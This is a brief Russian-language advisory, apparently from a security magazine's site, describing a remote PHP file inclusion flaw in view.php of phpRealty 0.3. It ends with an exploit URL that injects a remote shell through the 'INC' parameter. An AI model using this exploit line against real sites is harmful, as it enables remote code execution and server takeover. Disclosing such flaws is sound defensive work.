Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: phpRealty 0.3
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «propID» сценарием view.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.
Эксплоит:
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E
L L ] ?